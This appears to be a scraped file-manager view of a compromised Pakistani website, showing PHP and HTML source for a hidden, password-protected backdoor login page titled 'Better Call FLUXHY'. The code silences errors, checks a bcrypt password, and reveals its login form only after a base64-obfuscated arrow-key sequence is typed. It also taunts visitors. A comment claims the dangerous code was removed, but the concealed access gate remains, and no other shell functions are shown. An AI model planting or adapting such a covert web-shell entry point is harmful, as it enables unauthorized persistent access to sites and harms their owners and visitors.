/
home
/
apkhrccx
/
gk999.com.pk
/
New Directory
Upload File
HOME
<?php error_reporting(0); ini_set('display_errors', 0); session_start(); /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ function login($password) { $valid_password_hash = '$2a$10$Vn2h8cfBwFp6KdgS/2DJme2K6ft5taOs9iGKnZywuiJMsPk1Sa9BG'; if (password_verify($password, $valid_password_hash)) { $_SESSION['R10TXER'] = 'user'; return true; } return false; } if (isset($_POST['password'])) { if (login($_POST['password'])) { header('Location: ' . $_SERVER['PHP_SELF']); exit; } else { echo '<script>alert("Password salah!");</script>'; } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Better Call FLUXHY</title> <style> html, body { margin:0; padding:0; height:100%; background:#000; font-family:monospace; display:flex; justify-content:center; align-items:center; color:#FF073A; text-align:center; } .container { display:flex; flex-direction:column; align-items:center; } .neon { font-size:24px; color:#f0fff0; text-shadow: 0 0 4px #f0fff0, 0 0 8px #f0fff0, 0 0 12px #f0fff0, 0 0 20px #bb00ff, 0 0 40px #bb00ff; animation:flicker 1.5s infinite alternate; margin:6px 0; } .neon.small { font-size:16px; opacity:0.85; } #loginBox { display:none; margin-top:15px; } input[type=password] { padding:8px; font-size:14px; border-radius:8px; border:1px solid #bb00ff; background:#111; color:#fff; outline:none; box-shadow:0 0 8px #ffc0cb; } button { padding:8px 16px; border:none; border-radius:8px; background:#bb00ff; color:#fff; font-weight:bold; cursor:pointer; box-shadow:0 0 8px #ffc0cb; } button:hover { background:#ffc0cb; } @keyframes flicker { 0% { text-shadow:0 0 3px #ffc0cb,0 0 6px #ffc0cb,0 0 12px #bb00ff; opacity:1; } 50% { text-shadow:0 0 2px #ffc0cb,0 0 4px #bb00ff; opacity:0.9; } 100% { text-shadow:0 0 4px #ffc0cb,0 0 8px #bb00ff,0 0 12px #bb00ff; opacity:1; } } </style> </head> <body> <div class="container"> <div class="neon">Better Call <a href="THANKS FOR COMING TO HERE IDIOT !!!!" target="_blank" style="color:#FE019A;">THANKS FOR COMING TO HERE IDIOT !!!!</a></div> <div class="neon">Call FLUXHY For Open Password</div> <div id="loginBox"> <form method="POST"> <input type="password" name="password" placeholder="Enter Password"> <button type="submit">Login</button> </form> </div> </div> <script> const hidden = "QXJyb3dMZWZ0LEFycm93UmlnaHQsQXJyb3dMZWZ0LEFycm93UmlnaHQsQXJyb3dVcCxBcnJvd0Rvd24="; const sequence = atob(hidden).split(","); let pos=0; document.addEventListener("keydown", function(e){ if(e.key===sequence[pos]){ pos++; if(pos===sequence.length){ document.getElementById("loginBox").style.display="block"; document.querySelector("input[name=password]").focus(); pos=0; } } else { pos=0; } }); </script> </body> </html>